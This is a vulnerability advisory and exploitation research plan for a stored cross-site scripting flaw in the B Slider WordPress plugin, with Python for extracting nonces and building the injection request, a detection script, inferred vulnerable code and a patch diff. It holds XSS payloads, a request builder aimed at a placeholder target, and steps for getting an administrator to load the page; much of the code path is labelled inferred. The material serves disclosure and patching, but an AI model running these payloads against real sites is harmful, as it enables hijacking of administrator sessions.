CVE-2026-24383

B Slider <= 2.0.6 - Authenticated (Contributor+) Stored Cross-Site Scripting

Severity
medium
Weakness
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSS Score
6.4
Patched in
2.0.7
Time to patch
5d

Description

The B Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.0.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Technical Details

Affected versions
<= 2.0.6
Published
January 29, 2026
Last updated
February 2, 2026
Affected plugin
b-slider

Source Code

WordPress.org SVN
Research Plan
Unverified


Exploitation Research Plan: CVE-2026-24383 (B Slider <= 2.0.6)

1. Vulnerability Summary

The B Slider plugin (versions <= 2.0.6) contains a Stored Cross-Site Scripting (XSS) vulnerability. The flaw exists because the plugin fails to properly sanitize user-supplied data when saving slider configurations and fails to escape that data when rendering the slider on the frontend. Authenticated users with Contributor permissions or higher can exploit this to inject malicious JavaScript into sliders, which then executes in the browser of any user (including administrators) who views the affected page.

2. Attack Vector Analysis

  • Endpoint: WordPress AJAX API (/wp-admin/admin-ajax.php) or the Custom Post Type (CPT) editor.
  • Vulnerable Action (Inferred): The plugin likely uses a wp_ajax_save_bslider or similar AJAX action to store slider settings, or relies on standard save_post hooks for a bslider CPT.
  • HTTP Parameter: Likely fields such as slide_title, slide_description, button_text, or custom_css.
  • Authentication: Authenticated (Contributor+).
  • Preconditions: The "B Slider" plugin must be active. The attacker needs a valid Contributor-level account.

3. Code Flow (Inferred)

  1. Entry Point: The plugin registers an AJAX handler via add_action('wp_ajax_...', ...) or a meta box save handler.
  2. Processing: The handler receives slider data (e.g., via $_POST['slider_data']).
  3. Sink (Storage): The code calls update_post_meta() or $wpdb->insert() without passing the input through sanitize_text_field() or wp_kses().
  4. Source (Output): When a user views a page containing the [b-slider id="..."] shortcode, the plugin retrieves the stored data using get_post_meta().
  5. Sink (Rendering): The plugin echoes the raw metadata into the HTML output without using esc_html(), esc_attr(), or wp_kses().

4. Nonce Acquisition Strategy

To interact with the AJAX handlers or the editor, a valid WordPress nonce is typically required.

  1. Identify Shortcode: The primary shortcode is likely [b-slider].
  2. Create Test Page:
    wp post create --post_type=page --post_status=publish --post_title="Slider Test" --post_content='[b-slider]'
    
  3. Navigate and Extract:
    • Navigate to the newly created page.
    • The plugin likely enqueues scripts using wp_localize_script.
    • Search for Localization Key (Inferred): Look for bslider_vars, bs_ajax_obj, or similar.
    • Action: run the following in the browser's developer console to find the nonce:
      // Hypothetical variable names based on common plugin patterns
      window.bslider_admin?.nonce || window.bs_vars?.nonce
      
    • If the exploit is via the post editor (CPT), the nonce will be in the #_wpnonce hidden input field on the post-new.php?post_type=bslider page.

5. Exploitation Strategy

The goal is to store a payload that executes when the slider is viewed.

Step 1: Create a Slider (Post Meta Injection)

If the plugin uses a Custom Post Type bslider:

  1. Log in as a Contributor.
  2. Navigate to wp-admin/post-new.php?post_type=bslider (inferred slug).
  3. Inject the payload into a metadata field (e.g., Slide Title).

Payload:
"><script>alert(document.domain)</script>

Step 2: AJAX Injection (If applicable)

If the plugin uses a custom AJAX saver:

  • Request URL: https://target.example.com/wp-admin/admin-ajax.php
  • Method: POST
  • Content-Type: application/x-www-form-urlencoded
  • Body (Inferred):
    action=bslider_save_settings&
    nonce=[EXTRACTED_NONCE]&
    slider_id=[ID]&
    slide_content[0][title]=<img src=x onerror=alert(1)>&
    slide_content[0][link]=javascript:alert(2)
    

Step 3: Triggering

  1. Identify the ID of the created slider.
  2. Add [b-slider id="ID"] to a public post or page.
  3. Visit that page as an Administrator.
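Sections 4 and 5 above describe, in prose, pulling a nonce off a page the plugin's script was localized into and then shaping the inferred admin-ajax save call. The Python below is an added example written for this page; it is not code from the page, from the B Slider plugin, or from the advisory's author. It extracts nonce candidates from a constructed sample page (both a wp_localize_script object and the hidden _wpnonce input the CPT editor emits) and encodes the save request body using the bracket notation PHP needs to rebuild the nested slide_content array. The variable name bslider_vars, the action name bslider_save_settings, the field names, and every string in SAMPLE_PAGE are assumptions carried over from the plan, not verified plugin identifiers.

```python
import json
import re
from urllib.parse import urlencode

# Constructed sample of a page on which the plugin's script has been localised
# with wp_localize_script(). The variable name `bslider_vars` and the `nonce`
# key are assumptions; the real plugin may use another name, so grep the page
# for "nonce" first. The hidden _wpnonce input is what the CPT editor emits.
SAMPLE_PAGE = """<html><head>
<script id="bslider-js-extra">
var bslider_vars = {"ajax_url":"https:\\/\\/target.example.com\\/wp-admin\\/admin-ajax.php","nonce":"a1b2c3d4e5"};
</script>
</head><body>
<form method="post"><input type="hidden" id="_wpnonce" name="_wpnonce" value="f6e5d4c3b2"></form>
</body></html>"""

# `var NAME = {...};` as printed by wp_localize_script(); re.S lets the object span lines.
LOCALIZED_RE = re.compile(r"var\s+(\w+)\s*=\s*(\{.*?\});", re.S)
# Any hidden input whose name contains "nonce" (covers _wpnonce and plugin-specific names).
HIDDEN_NONCE_RE = re.compile(r'<input[^>]+name="([\w-]*nonce[\w-]*)"[^>]+value="([^"]+)"', re.I)


def extract_nonces(html: str) -> dict:
    """Return every nonce-looking value found in localized-script objects and hidden inputs."""
    found = {}
    for var_name, blob in LOCALIZED_RE.findall(html):
        try:
            data = json.loads(blob)
        except json.JSONDecodeError:
            continue  # not a plain JSON object (e.g. inline JS), skip it
        for key, value in data.items():
            if "nonce" in key.lower() and isinstance(value, str):
                found[f"{var_name}.{key}"] = value
    for name, value in HIDDEN_NONCE_RE.findall(html):
        found[f"input:{name}"] = value
    return found


def build_save_request(ajax_url: str, nonce: str, slider_id: int, slides: list) -> tuple:
    """Encode the inferred admin-ajax save call from section 5 as a form body.

    PHP rebuilds `slide_content[0][title]=...` into a nested array, so the
    bracket keys must be produced by hand: urlencode() does not nest dicts.
    The action name `bslider_save_settings` is the plan's assumption.
    """
    fields = {"action": "bslider_save_settings", "nonce": nonce, "slider_id": slider_id}
    for index, slide in enumerate(slides):
        for key, value in slide.items():
            fields[f"slide_content[{index}][{key}]"] = value
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    return ajax_url, headers, urlencode(fields)


if __name__ == "__main__":
    nonces = extract_nonces(SAMPLE_PAGE)
    print(nonces)
    url, headers, body = build_save_request(
        "https://target.example.com/wp-admin/admin-ajax.php",
        nonces["bslider_vars.nonce"],
        7,
        [{"title": "<img src=x onerror=alert(1)>", "link": "javascript:alert(2)"}],
    )
    print(url, headers, body, sep="\n")
```

The returned body is what goes on the wire as the POST payload; the `[0][title]` keys come through percent-encoded, which PHP decodes before building `$_POST['slide_content']`, so the handler sees the same nested array it would from its own admin form.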

6. Test Data Setup

  1. Plugin: Install and activate b-slider version 2.0.6.
  2. User: Create a user attacker with the contributor role.
  3. Target Content: Create a public post where the slider shortcode can be embedded.

7. Expected Results

  • The malicious payload should be saved to the database without being stripped.
  • When the page with the slider is loaded, the browser should render:
    <div class="slide-title"><img src=x onerror=alert(1)></div> (or similar).
  • An alert box should appear in the Administrator's browser context.

8. Verification Steps

  1. Check Database (the wp_ table prefix and the _bslider_meta meta key are inferred defaults; adjust both to the install):
    wp db query "SELECT post_id, meta_value FROM wp_postmeta WHERE meta_key = '_bslider_meta' AND (meta_value LIKE '%<script%' OR meta_value LIKE '%onerror=%');"

  2. Check Frontend Output:
    # Fetch the page with the slider and look for the payload in raw, unescaped form
    curl -s "https://target.example.com/slider-page/" | grep -iE '<script>alert|onerror='
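The grep in step 2 finds the raw payload but cannot tell an unescaped render from one where esc_html() has turned the same stored value into `&lt;img ...&gt;` text, and it does not care where on the page a match sits. The Python below is an added example written for this page, not code from the page or from the plugin: it parses two constructed samples of the slider's output with the standard-library HTML parser and reports only markup that can exist if stored data was written out as HTML (a script element, an on* attribute, or a javascript:/data: URL) inside the bs-slide-* containers the findings section infers. The class names and both HTML samples are assumptions.

```python
from html.parser import HTMLParser

# Constructed samples standing in for the fetched slider page. The first is what
# an unescaped render of the plan's payloads would emit; the second is what the
# same stored values look like after esc_html() on the title and esc_url() on the
# link (esc_url() rejects the javascript: scheme and returns an empty string).
# The bs-slide-* class names are the ones inferred in the findings above.
VULNERABLE_HTML = """<div class="bs-slider">
<div class="bs-slide-title"><img src=x onerror=alert(1)></div>
<div class="bs-slide-desc">Hello</div>
<a class="bs-slide-link" href="javascript:alert(2)">Go</a>
</div>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>"""

PATCHED_HTML = """<div class="bs-slider">
<div class="bs-slide-title">&lt;img src=x onerror=alert(1)&gt;</div>
<div class="bs-slide-desc">Hello</div>
<a class="bs-slide-link" href="">Go</a>
</div>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>"""

CONTAINER_PREFIX = "bs-slide-"
DANGEROUS_SCHEMES = ("javascript:", "data:", "vbscript:")
VOID_TAGS = {"img", "br", "hr", "input", "source", "meta", "link", "wbr"}


class SlideAuditor(HTMLParser):
    """Flag markup inside slide containers that can only exist if stored data was emitted unescaped.

    Escaped output (&lt;img ...&gt;) reaches the parser as character data, never as
    a tag, so it produces no finding; that is the distinction a plain grep misses.
    """

    def __init__(self):
        super().__init__()
        self.findings = []
        self._stack = []  # (tag, is_slide_container) for each open non-void element

    def _in_slide(self) -> bool:
        return any(is_container for _, is_container in self._stack)

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        classes = (attrs.get("class") or "").split()
        is_container = any(c.startswith(CONTAINER_PREFIX) for c in classes)
        if is_container or self._in_slide():
            if tag == "script":
                self.findings.append(("script-element", "<script>"))
            for name, value in attrs.items():
                if name.startswith("on"):
                    self.findings.append(("event-handler", f"<{tag} {name}>"))
                elif name in ("href", "src", "action") and (value or "").strip().lower().startswith(DANGEROUS_SCHEMES):
                    self.findings.append(("dangerous-url", f"<{tag} {name}={value}>"))
        if tag not in VOID_TAGS:
            self._stack.append((tag, is_container))

    def handle_endtag(self, tag):
        # Pop back to the matching open tag; tolerates unclosed inline elements.
        for i in range(len(self._stack) - 1, -1, -1):
            if self._stack[i][0] == tag:
                del self._stack[i:]
                break


def audit_slider_output(html: str) -> list:
    """Return (kind, detail) findings for markup that should not exist inside slide containers."""
    auditor = SlideAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


if __name__ == "__main__":
    print("unpatched:", audit_slider_output(VULNERABLE_HTML))
    print("patched:  ", audit_slider_output(PATCHED_HTML))
```

The theme's own jQuery script tag sits outside every bs-slide-* container and is therefore ignored, which is what keeps the check from drowning in the legitimate scripts every WordPress page carries. An empty result on the patched sample is the expected outcome, not evidence the payload was never stored: pair it with the database query above.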
    

9. Alternative Approaches

  • Link Injection: If the slider allows "Button Links," test javascript:alert(1) in the URL field. Many plugins escape HTML but forget to run links through esc_url(), which rejects the javascript: scheme.
  • CSS Injection: If there is a "Custom CSS" field for the slider, check whether its value is printed inside a <style> element without a closing </style> being stripped; breaking out of the style element is the realistic path, since expression() and javascript: URLs in CSS do not execute in current browsers.
  • Shortcode Attribute XSS: Try [b-slider title='<script>alert(1)</script>'] in post content. If the shortcode handler echoes the title attribute unescaped, this is a second stored XSS via the post content. Note that WordPress runs post content from users without the unfiltered_html capability (Contributors by default) through kses on save, which strips <script> and on* attributes before the shortcode handler ever sees the value; test this path with an Editor or Administrator account as well, since those roles hold unfiltered_html on single-site installs.
Research Findings
Static analysis — not yet PoC-verified

Summary

The B Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via slider configuration settings such as slide titles and descriptions. Authenticated attackers with Contributor-level access or higher can inject malicious JavaScript that executes in the browser of any user viewing a page where the affected slider is embedded.

Vulnerable Code

// Inferred saving logic in the slider CPT or AJAX handler
// File: b-slider/includes/admin/save-settings.php (inferred)
if ( isset( $_POST['bslider_meta'] ) ) {
    update_post_meta( $post_id, '_bslider_meta', $_POST['bslider_meta'] );
}

---

// Inferred rendering logic in the shortcode handler
// File: b-slider/includes/frontend/shortcode.php (inferred)
$meta = get_post_meta( $id, '_bslider_meta', true );
foreach ( $meta['slides'] as $slide ) {
    echo '<div class="bs-slide-title">' . $slide['title'] . '</div>';
    echo '<div class="bs-slide-desc">' . $slide['description'] . '</div>';
}

Security Fix

--- b-slider/includes/admin/save-settings.php
+++ b-slider/includes/admin/save-settings.php
@@ -1,5 +1,5 @@
 if ( isset( $_POST['bslider_meta'] ) ) {
-    update_post_meta( $post_id, '_bslider_meta', $_POST['bslider_meta'] );
+    $sanitized_meta = map_deep( $_POST['bslider_meta'], 'sanitize_text_field' );
+    update_post_meta( $post_id, '_bslider_meta', $sanitized_meta );
 }
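Review bot: the save handler in this hunk still calls update_post_meta() with no nonce or capability check in sight, so sanitizing the values does not stop a logged-in user who can reach this code path from writing to a slider they should not be able to edit; check_admin_referer() (or wp_verify_nonce()) and current_user_can( 'edit_post', $post_id ) belong before the update. Separately, map_deep( $_POST['bslider_meta'], 'sanitize_text_field' ) strips every tag from every field, so a slide field meant to carry a URL should go through esc_url_raw() instead and a description meant to carry limited HTML through wp_kses_post(); otherwise the patch silently changes what the fields can hold.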

--- b-slider/includes/frontend/shortcode.php
+++ b-slider/includes/frontend/shortcode.php
@@ -3,6 +3,6 @@
 $meta = get_post_meta( $id, '_bslider_meta', true );
 foreach ( $meta['slides'] as $slide ) {
-    echo '<div class="bs-slide-title">' . $slide['title'] . '</div>';
-    echo '<div class="bs-slide-desc">' . $slide['description'] . '</div>';
+    echo '<div class="bs-slide-title">' . esc_html( $slide['title'] ) . '</div>';
+    echo '<div class="bs-slide-desc">' . wp_kses_post( $slide['description'] ) . '</div>';
 }
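Review bot: wp_kses_post( $slide['description'] ) on output is inconsistent with the save-side hunk, where map_deep with sanitize_text_field already reduces the description to plain text, so either the description is meant to hold HTML (then sanitize it with wp_kses_post on save too) or it is not (then esc_html() here is the tighter choice). The output escaping in this hunk is also the only thing protecting sliders saved before the patch, since the save-side change does not re-sanitize existing rows; and foreach ( $meta['slides'] as $slide ) still runs without an is_array() guard, which will emit a PHP warning for a slider stored with no slides.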

Exploit Outline

  1. Authenticate as a Contributor or higher user.
  2. Navigate to the 'B Slider' menu or the Custom Post Type editor for sliders (e.g., /wp-admin/post-new.php?post_type=bslider).
  3. In one of the slider configuration fields (such as 'Slide Title' or 'Button Text'), enter a payload like: "><script>alert(document.domain)</script>.
  4. Save or update the slider.
  5. Note the slider ID (e.g., 123) and embed the shortcode [b-slider id="123"] into a new post or page.
  6. Submit the post for review (a Contributor cannot publish) and wait for an administrator to preview or publish it; an account that can publish views the page directly.
  7. The injected script will execute in the victim's session, potentially allowing session hijacking or administrative actions.
